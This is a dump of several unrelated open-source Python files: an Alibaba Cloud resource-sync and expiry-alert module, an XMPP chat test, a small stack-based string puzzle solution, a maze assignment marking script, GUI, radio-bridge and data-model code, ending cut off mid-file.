import models as ecs_20140526_models\nfrom Tea.exceptions import TeaException\nfrom alibabacloud_bssopenapi20171214.client import Client as BssOpenApi20171214Client\nfrom alibabacloud_bssopenapi20171214 import models as bss_open_api_20171214_models\nfrom alibabacloud_tea_util import models as util_models\nfrom alibabacloud_tea_util.client import Client as UtilClient\n\nimport sys,datetime,hashlib\nfrom units import consul_kv,consul_svc\nfrom units.cloud import sync_ecs\nfrom units.cloud import notify\n\ndef exp(account,collect_days,notify_days,notify_amount):\n ak,sk = consul_kv.get_aksk('alicloud',account)\n now = datetime.datetime.utcnow().strftime('%Y-%m-%dT16:00:00Z')\n collect = (datetime.datetime.utcnow() + datetime.timedelta(days=collect_days+1)).strftime('%Y-%m-%dT16:00:00Z')\n config = open_api_models.Config(access_key_id=ak,access_key_secret=sk)\n config.endpoint = f'business.aliyuncs.com'\n client = BssOpenApi20171214Client(config)\n query_available_instances_request = bss_open_api_20171214_models.QueryAvailableInstancesRequest(\n renew_status='ManualRenewal',\n end_time_start=now,\n end_time_end=collect)\n runtime = util_models.RuntimeOptions()\n amount_response = client.query_account_balance()\n try:\n exp = client.query_available_instances_with_options(query_available_instances_request, runtime)\n exp_list = exp.body.to_map()['Data']['InstanceList']\n exp_dict = {}\n isnotify_list = consul_kv.get_keys_list(f'ConsulManager/exp/isnotify/alicloud/{account}')\n isnotify_list = [i.split('/')[-1] for i in isnotify_list]\n notify_dict = {}\n amount_dict = {}\n for i in exp_list:\n notify_id = hashlib.md5(str(i).encode(encoding='UTF-8')).hexdigest()\n endtime = datetime.datetime.strptime(i['EndTime'],'%Y-%m-%dT%H:%M:%SZ') + datetime.timedelta(hours=8)\n endtime_str = endtime.strftime('%Y-%m-%d')\n iname = consul_svc.get_sid(i['InstanceID'])['instance']['Meta']['name'] if i['ProductCode'] == 'ecs' else 'Null'\n exp_dict[i['InstanceID']] = {'Region':i.get('Region','Null'),'Product':i['ProductCode'],\n 'Name':iname,'EndTime':endtime_str,'notify_id':notify_id,\n 'Ptype':i.get('ProductType',i['ProductCode'])}\n if (endtime - datetime.datetime.now()).days < notify_days and notify_id not in isnotify_list:\n notify_dict[i['InstanceID']] = exp_dict[i['InstanceID']]\n consul_kv.put_kv(f'ConsulManager/exp/lists/alicloud/{account}/exp', exp_dict)\n amount = float(amount_response.body.data.available_amount.replace(',',''))\n consul_kv.put_kv(f'ConsulManager/exp/lists/alicloud/{account}/amount',{'amount':amount})\n if amount < notify_amount:\n amount_dict = {'amount':amount}\n exp_config = consul_kv.get_value('ConsulManager/exp/config')\n wecomwh = exp_config.get('wecomwh','')\n dingdingwh = exp_config.get('dingdingwh','')\n feishuwh = exp_config.get('feishuwh','')\n if notify_dict != {}:\n msg = [f'### 阿里云账号 {account}:\\n### 以下资源到期日小于 {notify_days} 天:']\n for k,v in notify_dict.items():\n iname = k if v['Name'] == 'Null' else v['Name']\n msg.append(f\"- {v['Region']}:{v['Product']}:{iname}:{v['EndTime']}\")\n content = '\\n'.join(msg)\n if exp_config['switch'] and exp_config.get('wecom',False):\n notify.wecom(wecomwh,content)\n if exp_config['switch'] and exp_config.get('dingding',False):\n notify.dingding(dingdingwh,content)\n if exp_config['switch'] and exp_config.get('feishu',False):\n title = '阿里云资源到期通知'\n md = content\n notify.feishu(feishuwh,title,md)\n if amount_dict != {}:\n content = f'### 阿里云账号 {account}:\\n### 可用余额:{amount} 元'\n if exp_config['switch'] and exp_config.get('wecom',False):\n notify.wecom(wecomwh,content)\n if exp_config['switch'] and exp_config.get('dingding',False):\n notify.dingding(dingdingwh,content)\n if exp_config['switch'] and exp_config.get('feishu',False):\n title = '阿里云余额不足通知'\n md = content\n notify.feishu(feishuwh,title,md)\n\n except Exception as error:\n UtilClient.assert_as_string(error.message)\n\ndef group(account):\n ak,sk = consul_kv.get_aksk('alicloud',account)\n now = datetime.datetime.now().strftime('%m%d/%H:%M')\n config = open_api_models.Config(access_key_id=ak,access_key_secret=sk)\n config.endpoint = f'resourcemanager.aliyuncs.com'\n client = ResourceManager20200331Client(config)\n list_resource_groups_request = resource_manager_20200331_models.ListResourceGroupsRequest(page_size=100)\n try:\n proj = client.list_resource_groups(list_resource_groups_request)\n proj_list = proj.body.resource_groups.to_map()['ResourceGroup']\n group_dict = {i['Id']:i['DisplayName'] for i in proj_list}\n consul_kv.put_kv(f'ConsulManager/assets/alicloud/group/{account}',group_dict)\n count = len(group_dict)\n data = {'count':count,'update':now,'status':20000,'msg':f'同步资源组成功!总数:{count}'}\n consul_kv.put_kv(f'ConsulManager/record/jobs/alicloud/{account}/group', data)\n print('【JOB】===>', 'alicloud_group', account, data, flush=True)\n except TeaException as e:\n emsg = e.message.split('. ',1)[0]\n print(\"【code:】\",e.code,\"\\n【message:】\",emsg, flush=True)\n data = consul_kv.get_value(f'ConsulManager/record/jobs/alicloud/{account}/group')\n if data == {}:\n data = {'count':'无','update':f'失败{e.code}','status':50000,'msg':emsg}\n else:\n data['update'] = f'失败{e.code}'\n data['msg'] = emsg\n consul_kv.put_kv(f'ConsulManager/record/jobs/alicloud/{account}/group', data)\n except Exception as e:\n data = {'count':'无','update':f'失败','status':50000,'msg':str(e)}\n consul_kv.put_kv(f'ConsulManager/record/jobs/alicloud/{account}/group', data)\n\ndef ecs(account,region):\n ak,sk = consul_kv.get_aksk('alicloud',account)\n now = datetime.datetime.now().strftime('%m%d/%H:%M')\n group_dict = consul_kv.get_value(f'ConsulManager/assets/alicloud/group/{account}')\n\n config = open_api_models.Config(access_key_id=ak,access_key_secret=sk)\n config.endpoint = f'ecs.{region}.aliyuncs.com'\n client = Ecs20140526Client(config)\n\n next_token = '0'\n ecs_dict = {}\n try:\n while next_token != '':\n describe_instances_request = ecs_20140526_models.DescribeInstancesRequest(\n max_results=100,\n region_id=region,\n next_token=next_token\n )\n ecs = client.describe_instances(describe_instances_request)\n ecs_list = ecs.body.instances.to_map()['Instance']\n ecs_dict_temp = {i['InstanceId']:{\n 'name':i['InstanceName'],'group':group_dict.get(i['ResourceGroupId'],'无'),'ostype':i['OSType'].lower(),\n 'status':i['Status'],'region':region,\n 'ip':i[\"InnerIpAddress\"][\"IpAddress\"] if len(i[\"InnerIpAddress\"][\"IpAddress\"]) != 0 else i['NetworkInterfaces']['NetworkInterface'][0]['PrimaryIpAddress'],\n 'cpu':f\"{i['Cpu']}核\",'mem':f\"{str(round(i['Memory']/1024,1)).rstrip('.0')}GB\",'exp':i['ExpiredTime'].split('T')[0],'ecstag': i.get('Tags',{}).get('Tag',[])\n }for i in ecs_list}\n ecs_dict.update(ecs_dict_temp)\n next_token = ecs.body.next_token\n\n count = len(ecs_dict)\n off,on = sync_ecs.w2consul('alicloud',account,region,ecs_dict)\n data = {'count':count,'update':now,'status':20000,'on':on,'off':off,'msg':f'ECS同步成功!总数:{count},开机:{on},关机:{off}'}\n consul_kv.put_kv(f'ConsulManager/record/jobs/alicloud/{account}/ecs/{region}', data)\n print('【JOB】===>', 'alicloud_ecs', account,region, data, flush=True)\n except TeaException as e:\n emsg = e.message.split('. ',1)[0]\n print(\"【code:】\",e.code,\"\\n【message:】\",emsg, flush=True)\n data = consul_kv.get_value(f'ConsulManager/record/jobs/alicloud/{account}/ecs/{region}')\n if data == {}:\n data = {'count':'无','update':f'失败{e.code}','status':50000,'msg':emsg}\n else:\n data['update'] = f'失败{e.code}'\n data['msg'] = emsg\n consul_kv.put_kv(f'ConsulManager/record/jobs/alicloud/{account}/ecs/{region}', data)\n except Exception as e:\n data = {'count':'无','update':f'失败','status':50000,'msg':str(e)}\n consul_kv.put_kv(f'ConsulManager/record/jobs/alicloud/{account}/ecs/{region}', data)\n","repo_name":"xugaopeng1/ConsulManager","sub_path":"flask-consul/units/cloud/alicloud.py","file_name":"alicloud.py","file_ext":"py","file_size_in_byte":9340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"14450406717","text":"\n\"\"\"\nTest that s with a chat state notification but no body don't create a\nnew text channel.\n\"\"\"\n\nfrom twisted.words.xish import domish\n\nfrom gabbletest import exec_test\nimport constants as cs\nimport ns\n\ndef test(q, bus, conn, stream):\n # message without body\n m = domish.Element((None, 'message'))\n m['from'] = 'alice@foo.com'\n m['type'] = 'chat'\n m.addElement((ns.CHAT_STATES, 'composing'))\n stream.send(m)\n\n # message with body\n m = domish.Element((None, 'message'))\n m['from'] = 'bob@foo.com'\n m['type'] = 'chat'\n m.addElement((ns.CHAT_STATES, 'active'))\n m.addElement('body', content='hello')\n stream.send(m)\n\n # first message should be from Bob, not Alice\n event = q.expect('dbus-signal', signal='NewChannel')\n assert event.args[1] == cs.CHANNEL_TYPE_TEXT\n jid = conn.InspectHandles(cs.HT_CONTACT, [event.args[3]])[0]\n assert jid == 'bob@foo.com'\n\nif __name__ == '__main__':\n exec_test(test)\n","repo_name":"jku/telepathy-gabble","sub_path":"tests/twisted/text/test-text-no-body.py","file_name":"test-text-no-body.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"6922161955","text":"t = int(input())\nfor i in range(t):\n pw = []\n dummy = []\n log = input()\n # 커서를 기준으로 두 스택을 이용하여 처리\n # 문자일때는 왼쪽 스택에 삽입\n # < 일때는 왼쪽에서 오른쪽으로 삽입\n # > 일때는 오른쪽에서 왼쪽으로 삽입\n for char in log:\n if char =='<' :\n if pw:\n dummy.append(pw.pop())\n elif char =='>':\n if dummy:\n pw.append(dummy.pop())\n elif char =='-':\n pw.pop()\n else:\n pw.append(char)\n pw.extend(reversed(dummy))\n print(''.join(pw))\n\n\ntest_cases = int(input())\n\n","repo_name":"wjddn3711/algorithm","sub_path":"basic/5397.py","file_name":"5397.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12827093936","text":"import platform\nimport os\nimport shutil\n\nmap_count = 18\n\n\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\n###\n# Helpers for all tasks\n###\n\n\ndef print_map(map):\n for row in map:\n print(f'{row}\\n')\n\n\ndef compare_maps(soln_map, stu_map):\n # Compare current stu_path with current soln_path\n for i, soln_row in enumerate(soln_map):\n if soln_row != stu_map[i]:\n return False\n\n return True\n\n\ndef validate_map(m, steps=None, path=None):\n print_map(m)\n if steps is not None:\n print(f'Steps: {steps}')\n if path is not None:\n print(f'Path: {path}')\n\n ans = input(\"Is this map valid? [y/Y/n/N] \")\n\n while True:\n if ans == \"y\" or ans == \"n\":\n break\n ans = input(\"Please enter y/Y/n/N \")\n\n return True if ans.lower() == \"y\" else False\n\n###\n# Task A: check that input and map match\n###\n\n\ndef taskA(solution, answer):\n # Get our solution's map, without outer walls\n soln_map = []\n if(solution.readline().rstrip() == \"--- Task 1 ---\"):\n line = solution.readline().rstrip()\n while line != \"--- Task 2 ---\":\n soln_map.append(line)\n line = solution.readline().rstrip()\n\n # Get the student's map\n stu_map = []\n if(answer.readline().rstrip() == \"--- Task 1 ---\"):\n line = answer.readline().rstrip()\n while line != \"--- Task 2 ---\":\n stu_map.append(line)\n line = answer.readline().rstrip()\n\n # Check if they're the same\n correct_rows = 0\n for i, row in enumerate(soln_map):\n if(row == stu_map[i]):\n correct_rows += 1\n else:\n print(f'{bcolors.FAIL} Row {i} is incorrect! {bcolors.ENDC}')\n print(f'\\tExpected:\\n\\t{row}\\n\\tGot:\\n\\t{stu_map[i]}\\n')\n\n if(correct_rows == 11):\n # Full marks\n a_mark = 10\n colour = bcolors.OKGREEN\n elif(correct_rows > 0):\n # Maximum mark of 8\n a_mark = correct_rows * 2\n if(correct_rows > 8):\n a_mark = 8\n colour = bcolors.WARNING\n else:\n # Hardcoded or just incorrect map\n a_mark = 0\n colour = bcolors.FAIL\n\n print(f'{colour} Task A: {a_mark}/10 {bcolors.ENDC}')\n\n###\n# Task B: check all paths are provided\n###\n\n\ndef get_paths(f):\n first_path = True\n paths = []\n line = f.readline().rstrip()\n while line != \"--- Task 3 ---\":\n # New path has started\n if \"--- Path\" in line:\n if first_path == True:\n # Ignore the first \"--- Path\" we encounter - path will be []\n first_path = False\n else:\n paths.append(path)\n\n path = []\n else:\n path.append(line)\n\n line = f.readline().rstrip()\n paths.append(path) # Append final path\n return paths\n\n\ndef remove_duplicate_paths(paths):\n # Just remove duplicates manually\n new_paths = []\n for path in paths:\n if path not in new_paths:\n new_paths.append(path)\n\n return new_paths\n\n\ndef taskB(solution, answer):\n #! Note: this removes duplicate shortest paths from the students answer\n\n # Get all the shortest paths printed out in the solution\n soln_paths = get_paths(solution)\n\n # Get all the shortest paths printed out in the student answer\n stu_paths = get_paths(answer)\n\n # Remove duplicate paths in stu_paths\n stu_paths = remove_duplicate_paths(stu_paths)\n\n # Find the correct paths (in RIP time complexity)\n actual_correct_paths = len(soln_paths)\n correct_paths = 0\n for i, soln_path in enumerate(soln_paths):\n match_found = False\n\n # Find the same path in stu_paths, if it exists\n for stu_path in stu_paths:\n if compare_maps(soln_path, stu_path) == True:\n stu_paths.remove(stu_path)\n match_found = True\n break\n\n if match_found == True:\n correct_paths += 1\n else:\n print(\n f'{bcolors.FAIL} Could not find solution path {i+1} in student paths {bcolors.ENDC}')\n\n # If there are leftover paths - deal with this manually\n # All paths here are not the shortest, but you may be able to get marks anyway\n valid_paths = 0\n if len(stu_paths) != 0:\n print(\n f'{len(stu_paths)} paths in the student answer are either invalid or not the shortest path')\n\n for path in stu_paths:\n if validate_map(path):\n valid_paths += 1\n\n # Calculate the mark for this phase\n if correct_paths == actual_correct_paths:\n # Full marks\n b_mark = 50\n colour = bcolors.OKGREEN\n elif correct_paths > 0 or valid_paths > 0:\n # Partial marks\n b_mark = 0\n\n # +20 for the first shortest path, +4 for every shortest path after that\n first_path = True\n for i in range(correct_paths):\n b_mark += 20 if first_path else 4\n first_path = False\n\n # +10 for the first valid path, +2 for every one after that\n first_path = True\n for i in range(valid_paths):\n b_mark += 10 if first_path else 2\n first_path = False\n\n # Maximum marks obtainable is 40\n if(b_mark > 40):\n b_mark = 40\n\n colour = bcolors.WARNING\n else:\n # No marks\n b_mark = 0\n colour = bcolors.FAIL\n\n print(f'{colour} Task B: {b_mark}/50 {bcolors.ENDC}')\n\n\n###\n# Task C: check the least turns path is valid\n###\n\n\ndef get_paths_and_steps(f):\n paths = []\n m = []\n line = f.readline().rstrip()\n\n while line != \"--- Task 4 ---\":\n if \"Path: \" in line:\n path = line.replace(\"Path: \", \"\")\n paths.append({\n \"map\": m,\n \"path\": path,\n \"steps\": steps,\n })\n m = []\n elif \"Steps: \" in line:\n steps = line.replace(\"Steps: \", \"\")\n else:\n m.append(line)\n\n line = f.readline().rstrip()\n\n return paths\n\n\ndef taskC(solution, answer):\n # Get all possible maps, paths and steps from the solution\n soln_paths = get_paths_and_steps(solution)\n\n # Get the least turns map from the student answer\n stu_paths = get_paths_and_steps(answer)\n\n if len(stu_paths) == 0:\n # No attempt made\n print(f'{bcolors.FAIL} Task C: 0/50 {bcolors.ENDC}')\n return\n\n stu_map = stu_paths[0][\"map\"]\n stu_steps = stu_paths[0][\"steps\"]\n stu_path = stu_paths[0][\"path\"]\n c_mark = 0\n\n for i in soln_paths:\n soln_map = i[\"map\"]\n soln_steps = i[\"steps\"]\n soln_path = i[\"path\"]\n\n # Found a matching maze!\n if compare_maps(soln_map, stu_map):\n # Double check the path and steps are the same as well\n if soln_steps == stu_steps:\n if soln_path == stu_path:\n # Everything is correct!\n c_mark += 30\n else:\n print(\n f'{bcolors.FAIL} Wrong path. Got {stu_path}. Expected {soln_path} {bcolors.ENDC}')\n # +5% for every 3 correct steps (consecutive)\n for s_index, s in enumerate(stu_path):\n if s == soln_path[s_index]:\n if s_index % 3 == 0:\n c_mark += 5\n else:\n break\n c_mark = 15 if c_mark > 15 else c_mark\n else:\n # +10 for finding a shortest path with least turns\n print(\n f'{bcolors.FAIL} Wrong number of steps. Got {stu_steps}. Expected {soln_steps} {bcolors.ENDC}')\n c_mark += 10\n\n # No match found - manually check if it is correct\n if c_mark == 0:\n print(\n f'Least turns path in the student answer is either invalid or not the shortest path')\n print(f'For reference, expecting {soln_steps} turns in the path')\n if validate_map(stu_map, steps=stu_steps, path=stu_path):\n c_mark += 20\n\n colour = bcolors.OKGREEN if c_mark == 30 else bcolors.WARNING\n colour = bcolors.FAIL if c_mark == 0 else colour\n\n print(f'{colour} Task C: {c_mark}/30 {bcolors.ENDC}')\n\n\n###\n# Task D: given the absolute path of the file, check if the path is correct\n###\n\ndef taskD(answer, m):\n f = answer.readline().rstrip()\n path = answer.readline().rstrip()\n\n if \"File: \" not in f or \"Path: \" not in path:\n d_mark = 0\n else:\n d_mark = 0\n f = f\"./Answers/PathPlanFound{m}.txt\"\n path = path.replace(\"Path: \", \"\")\n with open(f, \"r\") as stu_file:\n stu_path = stu_file.readline().rstrip()\n if stu_path == path:\n d_mark += 10\n else:\n print(\n f'{bcolors.FAIL} Wrong path. Got {stu_path}. Expected {path} {bcolors.ENDC}')\n # +2% for every 3 correct steps (consecutive)\n for s_index, s in enumerate(stu_path):\n if s == path[s_index]:\n if s_index % 3 == 0:\n d_mark += 2\n else:\n break\n\n d_mark = 8 if d_mark > 8 else d_mark\n\n colour = bcolors.OKGREEN if d_mark == 10 else bcolors.WARNING\n colour = bcolors.FAIL if d_mark == 0 else colour\n print(f'{colour} Task D: {d_mark}/10 {bcolors.ENDC}')\n\n\nfor m in range(map_count):\n # Make sure we're only testing answers that exist\n try:\n open(f\"./Answers/answer{m}.txt\", \"r\")\n open(f\"./Answers/PathPlanFound{m}.txt\", \"r\")\n except OSError as e:\n print(f\"{bcolors.FAIL} Failed to find answer{m}.txt or PathPlanFound{m}.txt.\\nPlease check the Answers directory {bcolors.ENDC}\")\n exit(0)\n\n # Copy a test map into ./Map.txt\n if os.path.isfile(\"./Map.txt\"):\n os.remove(\"./Map.txt\")\n shutil.copy(f\"./Maps/Map{m}.txt\", \"./Map.txt\")\n\n # Print the current Map we're testing with\n print(f\"=== Map {m} ===\")\n f = open('./Map.txt', 'r')\n file_contents = f.read()\n print(file_contents)\n f.close()\n\n # Generate solution and answer\n if platform.system() == 'Windows':\n os.system(\"winsln.exe > solution.txt\")\n elif platform.system() == 'Linux':\n os.system(\"./linuxsln > solution.txt\")\n else:\n os.system(\"./sln > solution.txt\")\n\n # This is where the actual marking happens\n with open(\"solution.txt\", \"r\") as solution:\n with open(f\"./Answers/answer{m}.txt\", \"r\") as answer:\n taskA(solution, answer)\n taskB(solution, answer)\n taskC(solution, answer)\n taskD(answer, m)\n","repo_name":"DanSpicyTaco/MTRN4110_PhaseB_Marking","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10856,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"15910323664","text":"from PySide2.QtWidgets import *\nfrom PySide2.QtGui import *\nfrom PySide2.QtCore import *\nfrom source.data import Data\n\n\nclass NodeChaosPlayer(QWidget):\n def __init__(self, parent, item_editor):\n super(NodeChaosPlayer, self).__init__(parent=parent)\n self.setStyleSheet('''\n QWidget{background-color:\n qlineargradient(spread:pad, x1:0, y1:0, x2:0, y2:1, stop:0 rgb(173, 173, 173), stop:1 rgb(131, 131, 131));\n color:rgb(255, 255, 255);\n }\n ''')\n self.item_editor = item_editor\n self.current_node = None\n self.graph_view = parent\n self.layout = QVBoxLayout(self)\n self.txt_text = QPlainTextEdit(self)\n self.list_view = QListView(self)\n self.layout.addWidget(self.txt_text)\n self.layout.addWidget(self.list_view)\n self.model = QStandardItemModel()\n self.list_view.setModel(self.model)\n self.list_view.clicked.connect(self.item_clicked)\n self.items = []\n\n def play(self, node):\n self.items.clear()\n self.item_editor.reset_items()\n self.load_node(node)\n\n def load_node(self, node):\n self.current_node = node\n self.txt_text.setPlainText(node.detail.text)\n self.model.clear()\n node.setSelected(True)\n for item in node.detail.items:\n self.item_editor.found_item(item)\n self.items.append(item)\n for connection in node.connections:\n next_node = Data.get_node(connection.destination.node.id)\n if next_node:\n if connection.path_item:\n title = next_node.detail.title\n row = QStandardItem(title)\n found_items = self.has_required_item(next_node.detail.required_items, self.items)\n if not len(found_items):\n title = f'(LOCKED){next_node.detail.title}'\n row.setText(title)\n row.setForeground(QBrush(Qt.red))\n row.setData(next_node, Qt.UserRole)\n self.model.appendRow(row)\n connection.path_item.setSelected(True)\n self.graph_view.frame_selected(self.graph_view.scene.selectedItems())\n\n def has_required_item(self, require_items, items):\n if not require_items:\n return [True]\n return list(set([i.id for i in require_items]) & set([i.id for i in items]))\n\n def clear(self):\n self.current_node.setSelected(False)\n for connection in self.current_node.connections:\n if connection.path_item:\n connection.path_item.setSelected(False)\n\n def item_clicked(self, index):\n item = self.model.itemFromIndex(index)\n if '(LOCKED)' in item.text():\n return\n self.clear()\n node = item.data(Qt.UserRole)\n self.load_node(node)","repo_name":"kenculate/NodeChaos","sub_path":"source/nodeChaosPlayer.py","file_name":"nodeChaosPlayer.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"20110250108","text":"'''\nTHIS EXAMPLE WILL NOT WORK AS IT IS - YOU MUST SPECIFY YOUR OWN VALUES!!!\n\nThis file is organized around the \"Conference Bridges\" that you wish to use. If you're a c-Bridge\nperson, think of these as \"bridge groups\". You might also liken them to a \"reflector\". If a particular\nsystem is \"ACTIVE\" on a particular conference bridge, any traffid from that system will be sent\nto any other system that is active on the bridge as well. This is not an \"end to end\" method, because\neach system must independently be activated on the bridge.\n\nThe first level (e.g. \"WORLDWIDE\" or \"STATEWIDE\" in the examples) is the name of the conference\nbridge. This is any arbitrary ASCII text string you want to use. Under each conference bridge\ndefinition are the following items -- one line for each HBSystem as defined in the main HBlink\nconfiguration file.\n\n * SYSTEM - The name of the sytem as listed in the main hblink configuration file (e.g. hblink.cfg)\n This MUST be the exact same name as in the main config file!!!\n * TS - Timeslot used for matching traffic to this confernce bridge\n XLX connections should *ALWAYS* use TS 2 only.\n * TGID - Talkgroup ID used for matching traffic to this conference bridge\n XLX connections should *ALWAYS* use TG 9 only.\n * ON and OFF are LISTS of Talkgroup IDs used to trigger this system off and on. Even if you\n only want one (as shown in the ON example), it has to be in list format. None can be\n handled with an empty list, such as \" 'ON': [] \".\n * TO_TYPE is timeout type. If you want to use timers, ON means when it's turned on, it will\n turn off afer the timout period and OFF means it will turn back on after the timout\n period. If you don't want to use timers, set it to anything else, but 'NONE' might be\n a good value for documentation!\n * TIMOUT is a value in minutes for the timout timer. No, I won't make it 'seconds', so don't\n ask. Timers are performance \"expense\".\n * RESET is a list of Talkgroup IDs that, in addition to the ON and OFF lists will cause a running\n timer to be reset. This is useful if you are using different TGIDs for voice traffic than\n triggering. If you are not, there is NO NEED to use this feature.\n'''\n\nBRIDGES = {\n 'WORLDWIDE': [\n {'SYSTEM': 'MASTER-1', 'TS': 1, 'TGID': 1, 'ACTIVE': True, 'TIMEOUT': 2, 'TO_TYPE': 'ON', 'ON': [2,], 'OFF': [9,10], 'RESET': []},\n {'SYSTEM': 'CLIENT-1', 'TS': 1, 'TGID': 3100, 'ACTIVE': True, 'TIMEOUT': 2, 'TO_TYPE': 'ON', 'ON': [2,], 'OFF': [9,10], 'RESET': []},\n ],\n 'ENGLISH': [\n {'SYSTEM': 'MASTER-1', 'TS': 1, 'TGID': 13, 'ACTIVE': True, 'TIMEOUT': 2, 'TO_TYPE': 'NONE', 'ON': [3,], 'OFF': [8,10], 'RESET': []},\n {'SYSTEM': 'CLIENT-2', 'TS': 1, 'TGID': 13, 'ACTIVE': True, 'TIMEOUT': 2, 'TO_TYPE': 'NONE', 'ON': [3,], 'OFF': [8,10], 'RESET': []},\n ],\n 'STATEWIDE': [\n {'SYSTEM': 'MASTER-1', 'TS': 2, 'TGID': 3129, 'ACTIVE': True, 'TIMEOUT': 2, 'TO_TYPE': 'NONE', 'ON': [4,], 'OFF': [7,10], 'RESET': []},\n {'SYSTEM': 'CLIENT-2', 'TS': 2, 'TGID': 3129, 'ACTIVE': True, 'TIMEOUT': 2, 'TO_TYPE': 'NONE', 'ON': [4,], 'OFF': [7,10], 'RESET': []},\n ]\n}\n\n'''\nlist the names of each system that should bridge unit to unit (individual) calls.\n'''\n\nUNIT = ['ONE', 'TWO']\n\n'''\nThis is for testing the syntax of the file. It won't eliminate all errors, but running this file\nlike it were a Python program itself will tell you if the syntax is correct!\n'''\n\nif __name__ == '__main__':\n from pprint import pprint\n pprint(BRIDGES)\n print(UNIT)\n","repo_name":"HBLink-org/hblink3","sub_path":"rules_SAMPLE.py","file_name":"rules_SAMPLE.py","file_ext":"py","file_size_in_byte":3667,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"48"} +{"seq_id":"31857415692","text":"import cv2\r\nfrom cv2 import threshold\r\nimport numpy as np\r\n\r\nimg = np.zeros((300,300,3),np.uint8)\r\ngreen = np.zeros((300,300,3),np.uint8)\r\n\r\ncv2.circle(img,(100,150),70,(0,127,127),cv2.FILLED)\r\ncv2.circle(green,(170,150),70,(127,0,127),cv2.FILLED)\r\n\r\nimg_and = cv2.bitwise_and(img,green)\r\nimg_and = cv2.cvtColor(img_and,cv2.COLOR_BGR2GRAY)\r\n\r\nret, mask1 = cv2.threshold(img_and, 20, 255, cv2.THRESH_BINARY_INV)\r\n\r\nred = np.zeros((300,300,3),np.uint8)\r\n\r\nred[:,:,2] = 255\r\nmask_red = cv2.bitwise_xor(img,red,mask = mask1)\r\n\r\ncv2.imshow('img',img)\r\ncv2.imshow('green',mask_red)\r\n\r\n\r\ncv2.waitKey(0)","repo_name":"supinzhen/100-Days-Of-Code","sub_path":"day13/pra13.py","file_name":"pra13.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38866753931","text":"# Create models for API requests and responses\nfrom pydantic import BaseModel, Field\nfrom pydantic_core import core_schema\nfrom pydantic.json_schema import JsonSchemaValue\nfrom bson import ObjectId\nfrom typing import Annotated, Any, Optional\n\n# ObjectId Annotation to make it compatible with Pydantic\n# https://stackoverflow.com/questions/76686267/what-is-the-new-way-to-declare-mongo-objectid-with-pydantic-v2-0\nclass ObjectIdPydanticAnnotation:\n @classmethod\n def validate_object_id(cls, v: Any, handler) -> ObjectId:\n if isinstance(v, ObjectId):\n return v\n\n s = handler(v)\n if ObjectId.is_valid(s):\n return ObjectId(s)\n else:\n raise ValueError(\"Invalid ObjectId\")\n\n @classmethod\n def __get_pydantic_core_schema__(cls, source_type, _handler) -> core_schema.CoreSchema:\n assert source_type is ObjectId\n return core_schema.no_info_wrap_validator_function(\n cls.validate_object_id, \n core_schema.str_schema(), \n serialization=core_schema.to_string_ser_schema(),\n )\n\n @classmethod\n def __get_pydantic_json_schema__(cls, _core_schema, handler) -> JsonSchemaValue:\n return handler(core_schema.str_schema())\n\n# Annotating ObjectId so that it behaves as a string for seralization purposes \nAnnotatedObjectId = Annotated[ObjectId, ObjectIdPydanticAnnotation]\n\n# Model definition (Creation)\n# To create an entry, every field (except id) is required\nclass Sepal(BaseModel):\n length: float = Field(..., description=\"Length of the sepal (required)\")\n width: float = Field(..., description=\"Width of the sepal (required)\")\n\nclass Petal(BaseModel):\n length: float = Field(..., description=\"Length of the petal (required)\")\n width: float = Field(..., description=\"Width of the petal (required)\")\n\nclass Flower(BaseModel):\n sepal: Sepal = Field(..., description=\"Sepal information (required)\")\n petal: Petal = Field(..., description=\"Petal information (required)\")\n species: str = Field(..., description=\"Species name (required)\")\n id: AnnotatedObjectId = Field(alias=\"_id\", description=\"Flower ID (generated)\", default_factory=ObjectId)\n\n class Config:\n populate_by_name = True\n json_schema_extra = {\n \"example\": {\n \"_id\": \"64c1d7c991e84e28c735a5c6\",\n \"sepal\": {\"length\": 5.1, \"width\": 3.5},\n \"petal\": {\"length\": 1.4, \"width\": 0.2},\n \"species\": \"Iris-setosa\"\n }\n }\n\n# Model definition (Update)\n# To update an entry, every field is optional (and there is no id, that is not updatable)\nclass SepalUpdate(BaseModel):\n length: Optional[float] = Field(None, description=\"Length of the sepal\")\n width: Optional[float] = Field(None, description=\"Width of the sepal\")\n\nclass PetalUpdate(BaseModel):\n length: Optional[float] = Field(None, description=\"Length of the petal\")\n width: Optional[float] = Field(None, description=\"Width of the petal\")\n\nclass FlowerUpdate(BaseModel):\n sepal: Optional[SepalUpdate] = Field(None, description=\"Sepal information\")\n petal: Optional[PetalUpdate] = Field(None, description=\"Petal information\")\n species: Optional[str] = Field(None, description=\"Species name\")\n\n class Config:\n json_schema_extra = {\n \"example\": {\n \"sepal\": {\"length\": 5.1, \"width\": 3.5},\n \"petal\": {\"length\": 1.4, \"width\": 0.2},\n \"species\": \"Iris-setosa\"\n }\n }\n","repo_name":"javierlopezrodriguez/mongodb-fastapi","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26728812333","text":"import webapp2\nimport os\nfrom google.appengine.ext.webapp import template\nfrom google.appengine.api import mail\nfrom google.appengine.ext import ndb\nimport hashlib\nfrom protorpc.messages import Enum\nfrom google.appengine.api import users\n\nimport logging # TODO remove \n\n\n# CONSTANTS\n\nNEWS_LETTER_SUBSCRIPTIONS_DATASTORE = 